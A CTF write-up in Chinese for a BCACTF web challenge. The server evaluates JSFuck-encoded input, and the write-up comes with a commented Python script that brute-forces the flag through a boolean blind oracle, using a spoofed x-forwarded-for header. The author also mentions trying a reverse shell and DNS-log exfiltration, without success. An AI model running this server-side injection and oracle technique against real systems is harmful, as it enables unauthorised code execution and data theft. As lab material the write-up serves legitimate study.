只能输入 `[` `]` `(` `)` `!` 这几个字符,其实就是 JSFuck 编码;第一层 eval 可以理解为 JSFuck 解码。
解码出来的内容又会被第二层 eval 执行,也就是说可以在服务端执行任意 JS,所以最简单的做法是直接 res.send(flag) 把 flag 回显出来。
当时没想到这个做法,想反弹 shell 或者用 dnslog 外带,都没成功,主要是对 JS 不熟,所以只能对 flag 一位一位地爆破。恕我代码写得很烂,爆得很慢。(原理是布尔盲注:用 if 语句做判断,猜对时表达式返回一个函数,这时 typeof 的结果就是 function,页面会回显 Attempting……;猜错时不会回显。注意下面脚本实际是用回显中是否包含 "abuse" 来判断的。)
import requests
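def jsencode(inp: str) -> str:
    """Return *inp* JSFuck-encoded, using the hiencode.com web encoder.

    Caveat: every probe payload is POSTed to a third-party site, so that
    site sees exactly what is being tested against the target.  A local
    JSFuck encoder would avoid the leak; none is available in this file.

    Raises:
        requests.HTTPError: if the encoder answers with an error status.
        ValueError: if the reply holds no ``<pre>...</pre>`` result block
            (the original slice silently returned junk in that case).
    """
    url = "http://www.hiencode.com/ctf/jsfuck_encrypt"
    # Hm_lvt_*/Hm_lpvt_* look like Baidu-analytics tracking cookies copied
    # from a browser session; the encoder presumably works without them --
    # TODO confirm before dropping the header.
    headers = {
        "Cookie": "Hm_lvt_beeb9fcd2a1fda9ad214b7e950c372fe=1717992800; "
        "Hm_lpvt_beeb9fcd2a1fda9ad214b7e950c372fe=1717992927",
    }
    # timeout: the original call could hang forever on a stalled connection.
    r = requests.post(url, data={"text": inp}, headers=headers, timeout=15)
    r.raise_for_status()
    _, opened, rest = r.text.partition("<pre>")
    if not opened:
        raise ValueError("jsencode: no <pre> result block in encoder response")
    # Take only up to the first </pre> *after* the opening tag; the original
    # searched for </pre> from the start of the page.
    encoded, closed, _ = rest.partition("</pre>")
    if not closed:
        raise ValueError("jsencode: unterminated <pre> block in encoder response")
    return encoded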
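# Boolean-oracle brute force against /check.  Each probe is a JS snippet
# that evaluates to a function only when the guess is right; the server's
# reply then contains SUCCESS_MARKER (the author's observation -- the
# write-up above talks about an "Attempting..." echo, this script keys on
# "abuse").
CHECK_URL = "http://challs.bcactf.com:32398/check"
# Headers copied from the browser request.  Content-Length is deliberately
# not set: requests computes it from the body, so the hard-coded "1" in the
# original was overwritten anyway.  x-forwarded-for is a spoofed client
# address carried over from that request; whether the server trusts it is
# not visible from this script.
CHECK_HEADERS = {
    "Host": "challs.bcactf.com:32398",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36",
    "Content-Type": "text/plain;charset=UTF-8",
    "Accept": "*/*",
    "Origin": "http://challs.bcactf.com:32398",
    "Referer": "http://challs.bcactf.com:32398/",
    "x-forwarded-for": "127.0.0.1",
    "Connection": "close",
}
SUCCESS_MARKER = "abuse"
TIMEOUT = 15


def oracle(js: str) -> bool:
    """POST the JSFuck encoding of *js* to /check; True when the reply
    carries SUCCESS_MARKER.  Echoes every reply like the original did."""
    r = requests.post(
        CHECK_URL, data=jsencode(js), headers=CHECK_HEADERS, timeout=TIMEOUT
    )
    print(r.text)
    # `in` instead of find() > 0: find() returns -1 on a miss, and the
    # original would also have missed a marker at offset 0.
    return SUCCESS_MARKER in r.text


# --- Stage 1: flag length ---------------------------------------------------
length = None
for i in range(100):
    if oracle(f"if(flag.length=={i}){{() => {{ return 'Hello, World!'; }};}}"):
        print(i)
        length = i
        break

# The original left `length` as '' here and then crashed with a TypeError in
# range(); fail loudly instead.
if length is None:
    raise SystemExit("flag length not found in 0..99; widen the search range")

# --- Stage 2: one character at a time ---------------------------------------
flag = "bcactf{"
# Start after the known prefix.  The original started at index 6, which is
# the '{' already in the prefix, so it re-appended it.  The upper bound
# skips the last index, presumably the closing '}'.
for j in range(len(flag), length - 1):
    for k in range(48, 130):
        i = chr(k)
        # NOTE: chr(92) '\' is injected unescaped into the JS string literal
        # and can never match; 127..129 are non-ASCII.  Kept as in the
        # original so the probed range is unchanged.
        if oracle(f"if(flag[{j}]=='{i}'){{() => {{ return 'Hello, World!'; }};}}"):
            flag += i
            print(flag)
            break
    else:
        # No candidate matched: keep positions aligned instead of silently
        # dropping the slot (the original let later characters shift left).
        flag += "?"
        print(f"position {j}: no match in the tested range, placeholder '?'")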